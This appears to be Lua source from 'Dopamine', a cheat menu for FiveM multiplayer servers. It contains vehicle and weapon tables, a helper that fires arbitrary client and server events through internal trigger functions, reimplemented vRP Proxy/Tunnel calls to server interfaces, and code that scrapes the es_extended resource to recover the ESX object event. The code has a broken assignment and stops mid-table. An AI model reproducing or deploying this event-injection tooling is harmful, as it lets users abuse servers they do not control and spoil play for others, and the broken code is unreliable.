- {name = 'Dodge Viper 1999', props = {["modOrnaments"] = -1,["modTrimB"] = -1,["modTank"] = -1,["modFrontBumper"] = -1,["suspensionRaise"] = -0.0099999997764826,["fuelLevel"] = 60.0,["modLivery"] = 0,["modBrakes"] = 2,["windowTint"] = 1,["modSideSkirt"] = -1,["modEngineBlock"] = -1,["tyreSmokeColor"] = { [1] = 255,[2] = 255,[3] = 255,["n"] = 3,} ,["pearlescentColor"] = 12,["modDoorSpeaker"] = -1,["modTransmission"] = 2,["modRoof"] = -1,["neonEnabled"] = { [1] = false,[2] = false,[3] = false,[4] = false,} ,["modSuspension"] = 3,["modTrunk"] = -1,["dirtLevel"] = 10.2,["modSteeringWheel"] = -1,["xenonColor"] = 255,["modArchCover"] = -1,["model"] = 726460559,["modAPlate"] = -1,["modHood"] = 0,["wheelColor"] = 28,["modRightFender"] = -1,["modXenon"] = 1,["modWindows"] = -1,["bodyHealth"] = 1000.0,["engineHealth"] = 1000.0,["modHydrolic"] = -1,["modExhaust"] = 0,["modSmokeEnabled"] = 1,["modShifterLeavers"] = -1,["modSeats"] = -1,["extras"] = { } ,["modArmor"] = 4,["modTurbo"] = 1,["modTrimA"] = -1,["color1"] = 12,["modEngine"] = 3,["modVanityPlate"] = -1,["wheels"] = 0,["modFender"] = -1,["modPlateHolder"] = -1,["modRearBumper"] = -1,["modHorns"] = -1,["modFrontWheels"] = -1,["modBackWheels"] = -1,["modAirFilter"] = -1,["modDashboard"] = -1,["plateIndex"] = 1,["modDial"] = -1,["modStruts"] = -1,["modGrille"] = -1,["color2"] = 28,["modFrame"] = -1,["neonColor"] = { [1] = 255,[2] = 0,[3] = 255,["n"] = 3,} ,["modSpeakers"] = -1,["modSpoilers"] = 1,["modAerials"] = -1,}},
- {name = 'Ford Mustang 1995', props = {["modOrnaments"] = -1,["modTrimB"] = -1,["modTank"] = -1,["modFrontBumper"] = 2,["suspensionRaise"] = 0.0,["fuelLevel"] = 60.0,["modLivery"] = -1,["modBrakes"] = 2,["windowTint"] = 1,["modSideSkirt"] = 0,["modEngineBlock"] = -1,["tyreSmokeColor"] = { [1] = 255,[2] = 255,[3] = 255,["n"] = 3,} ,["pearlescentColor"] = 89,["modDoorSpeaker"] = -1,["modTransmission"] = 2,["modRoof"] = 0,["neonEnabled"] = { [1] = false,[2] = false,[3] = false,[4] = false,} ,["modSuspension"] = 3,["modTrunk"] = -1,["dirtLevel"] = 3.2,["modSteeringWheel"] = -1,["xenonColor"] = 255,["modArchCover"] = -1,["model"] = 688884119,["modAPlate"] = -1,["modHood"] = 3,["wheelColor"] = 12,["modRightFender"] = -1,["modXenon"] = 1,["modWindows"] = -1,["bodyHealth"] = 1000.0,["engineHealth"] = 1000.0,["modHydrolic"] = -1,["modExhaust"] = 0,["modSmokeEnabled"] = 1,["modShifterLeavers"] = -1,["modSeats"] = -1,["extras"] = { ["1"] = true,["2"] = true,["3"] = true,} ,["modArmor"] = 4,["modTurbo"] = 1,["modTrimA"] = -1,["color1"] = 138,["modEngine"] = 3,["modVanityPlate"] = -1,["wheels"] = 7,["modFender"] = -1,["modPlateHolder"] = -1,["modRearBumper"] = 1,["modHorns"] = -1,["modFrontWheels"] = -1,["modBackWheels"] = -1,["modAirFilter"] = -1,["modDashboard"] = -1,["plateIndex"] = 1,["modDial"] = -1,["modStruts"] = -1,["modGrille"] = -1,["color2"] = 89,["modFrame"] = 1,["neonColor"] = { [1] = 255,[2] = 0,[3] = 255,["n"] = 3,} ,["modSpeakers"] = -1,["modSpoilers"] = 5,["modAerials"] = -1,}},
- {name = 'Ford Mustang 2019', props = {["modOrnaments"] = -1,["modTrimB"] = -1,["modTank"] = -1,["modFrontBumper"] = 6,["suspensionRaise"] = 0.0,["fuelLevel"] = 60.0,["modLivery"] = 5,["modBrakes"] = 2,["windowTint"] = 1,["modSideSkirt"] = 0,["modEngineBlock"] = -1,["tyreSmokeColor"] = { [1] = 255,[2] = 255,[3] = 255,["n"] = 3,} ,["pearlescentColor"] = 12,["modDoorSpeaker"] = -1,["modTransmission"] = 2,["modRoof"] = 1,["neonEnabled"] = { [1] = false,[2] = false,[3] = false,[4] = false,} ,["modSuspension"] = 3,["modTrunk"] = -1,["dirtLevel"] = 10.1,["modSteeringWheel"] = -1,["xenonColor"] = 255,["modArchCover"] = -1,["model"] = 1311724675,["modAPlate"] = -1,["modHood"] = 1,["wheelColor"] = 156,["modRightFender"] = -1,["modXenon"] = 1,["modWindows"] = -1,["bodyHealth"] = 1000.0,["engineHealth"] = 1000.0,["modHydrolic"] = -1,["modExhaust"] = 0,["modSmokeEnabled"] = 1,["modShifterLeavers"] = -1,["modSeats"] = -1,["extras"] = { } ,["modArmor"] = 4,["modTurbo"] = 1,["modTrimA"] = -1,["color1"] = 12,["modEngine"] = 3,["modVanityPlate"] = -1,["wheels"] = 1,["modFender"] = -1,["modPlateHolder"] = -1,["modRearBumper"] = -1,["modHorns"] = -1,["modFrontWheels"] = -1,["modBackWheels"] = -1,["modAirFilter"] = -1,["modDashboard"] = -1,["plateIndex"] = 1,["modDial"] = -1,["modStruts"] = -1,["modGrille"] = -1,["color2"] = 89,["modFrame"] = 0,["neonColor"] = { [1] = 255,[2] = 0,[3] = 255,["n"] = 3,} ,["modSpeakers"] = -1,["modSpoilers"] = 5,["modAerials"] = -1,}},
- {name = 'Honda S2000 AP2', props = {["modOrnaments"] = -1,["modTrimB"] = -1,["modTank"] = -1,["modFrontBumper"] = 1,["suspensionRaise"] = -0.070000000298023,["fuelLevel"] = 60.0,["modLivery"] = -1,["modBrakes"] = 2,["windowTint"] = 1,["modSideSkirt"] = 0,["modEngineBlock"] = -1,["tyreSmokeColor"] = { [1] = 255,[2] = 255,[3] = 255,["n"] = 3,} ,["pearlescentColor"] = 12,["modDoorSpeaker"] = -1,["modTransmission"] = 2,["modRoof"] = -1,["neonEnabled"] = { [1] = false,[2] = false,[3] = false,[4] = false,} ,["modSuspension"] = 2,["modTrunk"] = -1,["dirtLevel"] = 5.2,["modSteeringWheel"] = -1,["xenonColor"] = 255,["modArchCover"] = -1,["model"] = -1549019518,["modAPlate"] = -1,["modHood"] = 0,["wheelColor"] = 12,["modRightFender"] = -1,["modXenon"] = 1,["modWindows"] = -1,["bodyHealth"] = 1000.0,["engineHealth"] = 1000.0,["modHydrolic"] = -1,["modExhaust"] = 0,["modSmokeEnabled"] = 1,["modShifterLeavers"] = -1,["modSeats"] = -1,["extras"] = { ["2"] = false,} ,["modArmor"] = 4,["modTurbo"] = 1,["modTrimA"] = -1,["color1"] = 12,["modEngine"] = 3,["modVanityPlate"] = -1,["wheels"] = 0,["modFender"] = -1,["modPlateHolder"] = -1,["modRearBumper"] = 1,["modHorns"] = -1,["modFrontWheels"] = -1,["modBackWheels"] = -1,["modAirFilter"] = -1,["modDashboard"] = -1,["plateIndex"] = 1,["modDial"] = -1,["modStruts"] = -1,["modGrille"] = -1,["color2"] = 0,["modFrame"] = 1,["neonColor"] = { [1] = 255,[2] = 0,[3] = 255,["n"] = 3,} ,["modSpeakers"] = -1,["modSpoilers"] = 1,["modAerials"] = -1,}},
- {name = 'Range Rover Vogue ST', props = {["fuelLevel"] = 60.0,["modRightFender"] = 0,["suspensionRaise"] = -0.029999995604157,["modLivery"] = -1,["modDial"] = -1,["color1"] = 134,["modDashboard"] = -1,["modOrnaments"] = -1,["modFrontBumper"] = 1,["modSuspension"] = 3,["modAPlate"] = -1,["modTransmission"] = 2,["modTrimB"] = -1,["modAerials"] = -1,["modArchCover"] = -1,["modBackWheels"] = -1,["neonColor"] = { [1] = 255,[2] = 0,[3] = 255,["n"] = 3,} ,["plateIndex"] = 0,["modBrakes"] = 2,["windowTint"] = 1,["modAirFilter"] = -1,["modStruts"] = -1,["extras"] = { ["1"] = false,["2"] = true,} ,["modFrontWheels"] = -1,["wheels"] = 3,["modTrunk"] = -1,["modSpeakers"] = -1,["modSteeringWheel"] = -1,["modTrimA"] = -1,["modExhaust"] = 1,["modSideSkirt"] = -1,["pearlescentColor"] = 12,["modRoof"] = -1,["modSpoilers"] = 0,["modSeats"] = -1,["modRearBumper"] = -1,["modHood"] = 1,["modDoorSpeaker"] = -1,["modTurbo"] = 1,["modSmokeEnabled"] = 1,["tyreSmokeColor"] = { [1] = 255,[2] = 0,[3] = 0,["n"] = 3,} ,["modWindows"] = -1,["modTank"] = -1,["modXenon"] = 1,["modVanityPlate"] = -1,["engineHealth"] = 1000.0,["wheelColor"] = 111,["modPlateHolder"] = -1,["modEngineBlock"] = -1,["modEngine"] = 3,["bodyHealth"] = 1000.0,["modArmor"] = 4,["color2"] = 150,["modHorns"] = -1,["modShifterLeavers"] = -1,["modHydrolic"] = -1,["modFrame"] = 0,["xenonColor"] = 255,["model"] = 1993609528,["modFender"] = 0,["neonEnabled"] = { [1] = false,[2] = false,[3] = false,[4] = false,} ,["modGrille"] = 1,["dirtLevel"] = 4.0,}},
- },
- savedVehiclesOptionsHandle = nil,
- savedVehiclesOptionsDeleteHandle = nil,
- },
- mainColor = {
- r = 225,
- g = 55,
- b = 55,
- a = 255
- },
- menuTabsColors = {
- selfOptions = {r=255, g=255, b=255},
- onlineOptions = {r=255, g=255, b=255},
- visualOptions = {r=255, g=255, b=255},
- teleportOptions = {r=255, g=255, b=255},
- vehicleOptions = {r=255, g=255, b=255},
- weaponOptions = {r=255, g=255, b=255},
- serverOptions = {r=255, g=255, b=255},
- menuOptions = {r=255, g=255, b=255}
- },
- }
- Dopamine.dTCE = function(delayed, server, event, ...)
- if delayed then
- pCreateThread(function() pWait(50) end)
- end
- local payload = msgpack.pack({...})
- if server then
- TriggerServerEventInternal(event, payload, payload:len())
- else
- TriggerEventInternal(event, payload, payload:len())
- end
- end
- --[[ Proxy interface system, used to add/call functions between resources]]
- local Proxy = {}
- local proxy_rdata = {}
- local function proxy_callback(rvalues)
- proxy_rdata = rvalues
- end
- local function proxy_resolve(itable, key)
- local iname = getmetatable(itable).name
- local fcall = function(args, callback)
- if args == nil then
- args = {}
- end
- Dopamine.dTCE(false, false, iname .. ":proxy", key, args, proxy_callback)
- return table.unpack(proxy_rdata)
- end
- itable[key] = fcall
- return fcall
- end
- function Proxy.addInterface(name, itable)
- AddEventHandler(
- name .. ":proxy",
- function(member, args, callback)
- local f = itable[member]
- if type(f) == "function" then
- callback({f(table.unpack(args))})
- else
- end
- end
- )
- end
- function Proxy.getInterface(name)
- local r = setmetatable({}, {__index = proxy_resolve, name = name})
- return r
- end
- local Tools = {}
- local IDGenerator = {}
- function Tools.newIDGenerator()
- local r = setmetatable({}, {__index = IDGenerator})
- r:construct()
- return r
- end
- function IDGenerator:construct()
- self:clear()
- end
- function IDGenerator:clear()
- self.max = 0
- self.ids = {}
- end
- function IDGenerator:gen()
- if #self.ids > 0 then
- return table.remove(self.ids)
- else
- local r = self.max
- self.max = self.max + 1
- return r
- end
- end
- function IDGenerator:free(id)
- table.insert(self.ids, id)
- end
- local Tunnel = {}
- local function tunnel_resolve(itable, key)
- local mtable = getmetatable(itable)
- local iname =
- local ids = mtable.tunnel_ids
- local callbacks = mtable.tunnel_callbacks
- local identifier = mtable.identifier
- local fcall = function(args, callback)
- if args == nil then
- args = {}
- end
- if type(callback) == "function" then
- local rid = ids:gen()
- callbacks[rid] = callback
- Dopamine.dTCE(false, true, iname .. ":tunnel_req", key, args, identifier, rid)
- else
- Dopamine.dTCE(false, true, iname .. ":tunnel_req", key, args, "", -1)
- end
- end
- itable[key] = fcall
- return fcall
- end
- function Tunnel.bindInterface(name, interface)
- RegisterNetEvent(name .. ":tunnel_req")
- AddEventHandler(
- name .. ":tunnel_req",
- function(member, args, identifier, rid)
- local f = interface[member]
- local delayed = false
- local rets = {}
- if
- type(f) == "function"
- then
- TUNNEL_DELAYED = function()
- delayed = true
- return function(rets)
- rets = rets or {}
- if rid >= 0 then
- Dopamine.dTCE(false, true, name .. ":" .. identifier .. ":tunnel_res", rid, rets)
- end
- end
- end
- rets = {f(table.unpack(args))}
- end
- if not delayed and rid >= 0 then
- Dopamine.dTCE(false, true, name .. ":" .. identifier .. ":tunnel_res", rid, rets)
- end
- end
- )
- end
- function Tunnel.getInterface(name, identifier)
- local ids = Tools.newIDGenerator()
- local callbacks = {}
- local r =
- setmetatable(
- {},
- {__index = tunnel_resolve, name = name, tunnel_ids = ids, tunnel_callbacks = callbacks, identifier = identifier}
- )
- RegisterNetEvent(name .. ":" .. identifier .. ":tunnel_res")
- AddEventHandler(
- name .. ":" .. identifier .. ":tunnel_res",
- function(rid, args)
- local callback = callbacks[rid]
- if callback ~= nil then
- ids:free(rid)
- callbacks[rid] = nil
- callback(table.unpack(args))
- end
- end
- )
- return r
- end
- local vRP = Proxy.getInterface("vRP")
- Dopamine.datastore.es_extended = Dopamine.natives.loadResourceFile('es_extended', 'client/common.lua')
- if Dopamine.datastore.es_extended and string.len(Dopamine.datastore.es_extended) > 65 then
- local toFilter = {
- 'AddEventHandler',
- 'cb',
- 'function ',
- 'exports',
- 'return ESX',
- 'return ExM',
- 'getExtendedModeObject',
- '(ESX)',
- 'function',
- 'getSharedObject%(%)',
- 'end',
- '%(',
- '%)',
- ',',
- '\'',
- '"',
- 'UG',
- 'tonum',
- '\n',
- '%s+',
- }
- for i=1, #toFilter do
- Dopamine.datastore.es_extended = Dopamine.datastore.es_extended:gsub(toFilter[i], '')
- end
- end
- --[[pCreateThread(function()
- while Dopamine.shouldShowMenu and Dopamine.datastore.es_extended and Dopamine.datastore.ESX == nil do
- Dopamine.dTCE(false, false, tostring(Dopamine.datastore.es_extended), function(a) Dopamine.datastore.ESX = a end)
- pWait(30000)
- end
- end)]]
- Dopamine.trashTables.weaponsTable = { Melee = { BaseballBat = { id = 'weapon_bat', name = '~s~~s~Baseball Bat', bInfAmmo = false, mods = {} }, BrokenBottle = { id = 'weapon_bottle', name = '~s~~s~Broken Bottle', bInfAmmo = false, mods = {} }, Crowbar = { id = 'weapon_Crowbar', name = '~s~~s~Crowbar', bInfAmmo = false, mods = {} }, Flashlight = { id = 'weapon_flashlight', name = '~s~~s~Flashlight', bInfAmmo = false, mods = {} }, GolfClub = { id = 'weapon_golfclub', name = '~s~~s~Golf Club', bInfAmmo = false, mods = {} }, BrassKnuckles = { id = 'weapon_knuckle', name = '~s~~s~Brass Knuckles', bInfAmmo = false, mods = {} }, Knife = { id = 'weapon_knife', name = '~s~~s~Knife', bInfAmmo = false, mods = {} }, Machete = { id = 'weapon_machete', name = '~s~~s~Machete', bInfAmmo = false, mods = {} }, Switchblade = { id = 'weapon_switchblade', name = '~s~~s~Switchblade', bInfAmmo = false, mods = {} }, Nightstick = { id = 'weapon_nightstick', name = '~s~~s~Nightstick', bInfAmmo = false, mods = {} }, BattleAxe = { id = 'weapon_battleaxe', name = '~s~~s~Battle Axe', bInfAmmo = false, mods = {} } }, Handguns = { Pistol = { id = 'weapon_pistol', name = '~s~~s~Pistol', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_PISTOL_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_PISTOL_CLIP_02' } }, Flashlight = { { name = '~s~~s~Flashlight', id = 'COMPONENT_AT_PI_FLSH' } }, BarrelAttachments = { { name = '~s~~s~Suppressor', id = 'COMPONENT_AT_PI_SUPP_02' } } } }, PistolMK2 = { id = 'weapon_pistol_mk2', name = '~s~~s~Pistol MK 2', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_PISTOL_MK2_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_PISTOL_MK2_CLIP_02' }, { name = '~s~~s~Tracer Rounds', id = 'COMPONENT_PISTOL_MK2_CLIP_TRACER' }, { name = '~s~~s~Incendiary Rounds', id = 'COMPONENT_PISTOL_MK2_CLIP_INCENDIARY' }, { name = '~s~~s~Hollow Point Rounds', id = 'COMPONENT_PISTOL_MK2_CLIP_HOLLOWPOINT' }, { name = '~s~~s~FMJ Rounds', id = 'COMPONENT_PISTOL_MK2_CLIP_FMJ' } }, Sights = { { name = '~s~~s~Mounted Scope', id = 'COMPONENT_AT_PI_RAIL' } }, Flashlight = { { name = '~s~~s~Flashlight', id = 'COMPONENT_AT_PI_FLSH_02' } }, BarrelAttachments = { { name = '~s~~s~Compensator', id = 'COMPONENT_AT_PI_COMP' }, { name = '~s~~s~Suppessor', id = 'COMPONENT_AT_PI_SUPP_02' } } } }, CombatPistol = { id = 'weapon_combatpistol', name = '~s~~s~Combat Pistol', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_COMBATPISTOL_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_COMBATPISTOL_CLIP_02' } }, Flashlight = { { name = '~s~~s~Flashlight', id = 'COMPONENT_AT_PI_FLSH' } }, BarrelAttachments = { { name = '~s~~s~Suppressor', id = 'COMPONENT_AT_PI_SUPP' } } } }, APPistol = { id = 'weapon_appistol', name = '~s~~s~AP Pistol', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_APPISTOL_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_APPISTOL_CLIP_02' } }, Flashlight = { { name = '~s~~s~Flashlight', id = 'COMPONENT_AT_PI_FLSH' } }, BarrelAttachments = { { name = '~s~~s~Suppressor', id = 'COMPONENT_AT_PI_SUPP' } } } }, StunGun = { id = 'weapon_stungun', name = '~s~~s~Stun Gun', bInfAmmo = false, mods = {} }, Pistol50 = { id = 'weapon_pistol50', name = '~s~~s~Pistol .50', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_PISTOL50_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_PISTOL50_CLIP_02' } }, Flashlight = { { name = '~s~~s~Flashlight', id = 'COMPONENT_AT_PI_FLSH' } }, BarrelAttachments = { { name = '~s~~s~Suppressor', id = 'COMPONENT_AT_PI_SUPP_02' } } } }, SNSPistol = { id = 'weapon_snspistol', name = '~s~~s~SNS Pistol', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_SNSPISTOL_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_SNSPISTOL_CLIP_02' } } } }, SNSPistolMkII = { id = 'weapon_snspistol_mk2', name = '~s~~s~SNS Pistol Mk II', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_SNSPISTOL_MK2_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_SNSPISTOL_MK2_CLIP_02' }, { name = '~s~~s~Tracer Rounds', id = 'COMPONENT_SNSPISTOL_MK2_CLIP_TRACER' }, { name = '~s~~s~Incendiary Rounds', id = 'COMPONENT_SNSPISTOL_MK2_CLIP_INCENDIARY' }, { name = '~s~~s~Hollow Point Rounds', id = 'COMPONENT_SNSPISTOL_MK2_CLIP_HOLLOWPOINT' }, { name = '~s~~s~FMJ Rounds', id = 'COMPONENT_SNSPISTOL_MK2_CLIP_FMJ' } }, Sights = { { name = '~s~~s~Mounted Scope', id = 'COMPONENT_AT_PI_RAIL_02' } }, Flashlight = { { name = '~s~~s~Flashlight', id = 'COMPONENT_AT_PI_FLSH_03' } }, BarrelAttachments = { { name = '~s~~s~Compensator', id = 'COMPONENT_AT_PI_COMP_02' }, { name = '~s~~s~Suppressor', id = 'COMPONENT_AT_PI_SUPP_02' } } } }, HeavyPistol = { id = 'weapon_heavypistol', name = '~s~~s~Heavy Pistol', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_HEAVYPISTOL_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_HEAVYPISTOL_CLIP_02' } }, Flashlight = { { name = '~s~~s~Flashlight', id = 'COMPONENT_AT_PI_FLSH' } }, BarrelAttachments = { { name = '~s~~s~Suppressor', id = 'COMPONENT_AT_PI_SUPP' } } } }, VintagePistol = { id = 'weapon_vintagepistol', name = '~s~~s~Vintage Pistol', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_VINTAGEPISTOL_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_VINTAGEPISTOL_CLIP_02' } }, BarrelAttachments = { { 'Suppressor', id = 'COMPONENT_AT_PI_SUPP' } } } }, FlareGun = { id = 'weapon_flaregun', name = '~s~~s~Flare Gun', bInfAmmo = false, mods = {} }, MarksmanPistol = { id = 'weapon_marksmanpistol', name = '~s~~s~Marksman Pistol', bInfAmmo = false, mods = {} }, HeavyRevolver = { id = 'weapon_revolver', name = '~s~~s~Heavy Revolver', bInfAmmo = false, mods = {} }, HeavyRevolverMkII = { id = 'weapon_revolver_mk2', name = '~s~~s~Heavy Revolver Mk II', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Rounds', id = 'COMPONENT_REVOLVER_MK2_CLIP_01' }, { name = '~s~~s~Tracer Rounds', id = 'COMPONENT_REVOLVER_MK2_CLIP_TRACER' }, { name = '~s~~s~Incendiary Rounds', id = 'COMPONENT_REVOLVER_MK2_CLIP_INCENDIARY' }, { name = '~s~~s~Hollow Point Rounds', id = 'COMPONENT_REVOLVER_MK2_CLIP_HOLLOWPOINT' }, { name = '~s~~s~FMJ Rounds', id = 'COMPONENT_REVOLVER_MK2_CLIP_FMJ' } }, Sights = { { name = '~s~~s~Holograhpic Sight', id = 'COMPONENT_AT_SIGHTS' }, { name = '~s~~s~Small Scope', id = 'COMPONENT_AT_SCOPE_MACRO_MK2' } }, Flashlight = { { name = '~s~~s~Flashlight', id = 'COMPONENT_AT_PI_FLSH' } }, BarrelAttachments = { { name = '~s~~s~Compensator', id = 'COMPONENT_AT_PI_COMP_03' } } } }, DoubleActionRevolver = { id = 'weapon_doubleaction', name = '~s~~s~Double Action Revolver', bInfAmmo = false, mods = {} }, UpnAtomizer = { id = 'weapon_raypistol', name = '~s~~s~Up-n-Atomizer', bInfAmmo = false, mods = {} } }, SMG = { MicroSMG = { id = 'weapon_microsmg', name = '~s~~s~Micro SMG', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_MICROSMG_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_MICROSMG_CLIP_02' } }, Sights = { { name = '~s~~s~Scope', id = 'COMPONENT_AT_SCOPE_MACRO' } }, Flashlight = { { name = '~s~~s~Flashlight', id = 'COMPONENT_AT_PI_FLSH' } }, BarrelAttachments = { { name = '~s~~s~Suppressor', id = 'COMPONENT_AT_AR_SUPP_02' } } } }, SMG = { id = 'weapon_smg', name = '~s~~s~SMG', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_SMG_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_SMG_CLIP_02' }, { name = '~s~~s~Drum Magazine', id = 'COMPONENT_SMG_CLIP_03' } }, Sights = { { name = '~s~~s~Scope', id = 'COMPONENT_AT_SCOPE_MACRO_02' } }, Flashlight = { { name = '~s~~s~Flashlight', id = 'COMPONENT_AT_AR_FLSH' } }, BarrelAttachments = { { name = '~s~~s~Suppressor', id = 'COMPONENT_AT_PI_SUPP' } } } }, SMGMkII = { id = 'weapon_smg_mk2', name = '~s~~s~SMG Mk II', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_SMG_MK2_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_SMG_MK2_CLIP_02' }, { name = '~s~~s~Tracer Rounds', id = 'COMPONENT_SMG_MK2_CLIP_TRACER' }, { name = '~s~~s~Incendiary Rounds', id = 'COMPONENT_SMG_MK2_CLIP_INCENDIARY' }, { name = '~s~~s~Hollow Point Rounds', id = 'COMPONENT_SMG_MK2_CLIP_HOLLOWPOINT' }, { name = '~s~~s~FMJ Rounds', id = 'COMPONENT_SMG_MK2_CLIP_FMJ' } }, Sights = { { name = '~s~~s~Holograhpic Sight', id = 'COMPONENT_AT_SIGHTS_SMG' }, { name = '~s~~s~Small Scope', id = 'COMPONENT_AT_SCOPE_MACRO_02_SMG_MK2' }, { name = '~s~~s~Medium Scope', id = 'COMPONENT_AT_SCOPE_SMALL_SMG_MK2' } }, Flashlight = { { name = '~s~~s~Flashlight', id = 'COMPONENT_AT_AR_FLSH' } }, Barrel = { { name = '~s~~s~Default', id = 'COMPONENT_AT_SB_BARREL_01' }, { name = '~s~~s~Heavy', id = 'COMPONENT_AT_SB_BARREL_02' } }, BarrelAttachments = { { name = '~s~~s~Suppressor', id = 'COMPONENT_AT_PI_SUPP' }, { name = '~s~~s~Flat Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_01' }, { name = '~s~~s~Tactical Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_02' }, { name = '~s~~s~Fat-End Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_03' }, { name = '~s~~s~Precision Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_04' }, { name = '~s~~s~Heavy Duty Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_05' }, { name = '~s~~s~Slanted Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_06' }, { name = '~s~~s~Split-End Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_07' } } } }, AssaultSMG = { id = 'weapon_assaultsmg', name = '~s~~s~Assault SMG', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_ASSAULTSMG_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_ASSAULTSMG_CLIP_02' } }, Sights = { { name = '~s~~s~Scope', id = 'COMPONENT_AT_SCOPE_MACRO' } }, Flashlight = { { name = '~s~~s~Flashlight', id = 'COMPONENT_AT_AR_FLSH' } }, BarrelAttachments = { { name = '~s~~s~Suppressor', id = 'COMPONENT_AT_AR_SUPP_02' } } } }, CombatPDW = { id = 'weapon_combatpdw', name = '~s~~s~Combat PDW', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_COMBATPDW_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_COMBATPDW_CLIP_02' }, { name = '~s~~s~Drum Magazine', id = 'COMPONENT_COMBATPDW_CLIP_03' } }, Sights = { { name = '~s~~s~Scope', id = 'COMPONENT_AT_SCOPE_SMALL' } }, Flashlight = { { name = '~s~~s~Flashlight', id = 'COMPONENT_AT_AR_FLSH' } }, Grips = { { name = '~s~~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP' } } } }, MachinePistol = { id = 'weapon_machinepistol', name = '~s~~s~Machine Pistol ', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_MACHINEPISTOL_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_MACHINEPISTOL_CLIP_02' }, { name = '~s~~s~Drum Magazine', id = 'COMPONENT_MACHINEPISTOL_CLIP_03' } }, BarrelAttachments = { { name = '~s~~s~Suppressor', id = 'COMPONENT_AT_PI_SUPP' } } } }, MiniSMG = { id = 'weapon_minismg', name = '~s~~s~Mini SMG', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_MINISMG_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_MINISMG_CLIP_02' } } } }, UnholyHellbringer = { id = 'weapon_raycarbine', name = '~s~~s~Unholy Hellbringer', bInfAmmo = false, mods = {} } }, Shotguns = { PumpShotgun = { id = 'weapon_pumpshotgun', name = '~s~~s~Pump Shotgun', bInfAmmo = false, mods = { Flashlight = { { name = 'Flashlight', id = 'COMPONENT_AT_AR_FLSH' } }, BarrelAttachments = { { name = '~s~~s~Suppressor', id = 'COMPONENT_AT_SR_SUPP' } } } }, PumpShotgunMkII = { id = 'weapon_pumpshotgun_mk2', name = '~s~~s~Pump Shotgun Mk II', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Shells', id = 'COMPONENT_PUMPSHOTGUN_MK2_CLIP_01' }, { name = '~s~~s~Dragon Breath Shells', id = 'COMPONENT_PUMPSHOTGUN_MK2_CLIP_INCENDIARY' }, { name = '~s~~s~Steel Buckshot Shells', id = 'COMPONENT_PUMPSHOTGUN_MK2_CLIP_ARMORPIERCING' }, { name = '~s~~s~Flechette Shells', id = 'COMPONENT_PUMPSHOTGUN_MK2_CLIP_HOLLOWPOINT' }, { name = '~s~~s~Explosive Slugs', id = 'COMPONENT_PUMPSHOTGUN_MK2_CLIP_EXPLOSIVE' } }, Sights = { { name = '~s~~s~Holograhpic Sight', id = 'COMPONENT_AT_SIGHTS' }, { name = '~s~~s~Small Scope', id = 'COMPONENT_AT_SCOPE_MACRO_MK2' }, { name = '~s~~s~Medium Scope', id = 'COMPONENT_AT_SCOPE_SMALL_MK2' } }, Flashlight = { { name = '~s~~s~Flashlight', id = 'COMPONENT_AT_AR_FLSH' } }, BarrelAttachments = { { name = '~s~~s~Suppressor', id = 'COMPONENT_AT_SR_SUPP_03' }, { name = '~s~~s~Squared Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_08' } } } }, SawedOffShotgun = { id = 'weapon_sawnoffshotgun', name = '~s~~s~Sawed-Off Shotgun', bInfAmmo = false, mods = {} }, AssaultShotgun = { id = 'weapon_assaultshotgun', name = '~s~~s~Assault Shotgun', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_ASSAULTSHOTGUN_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 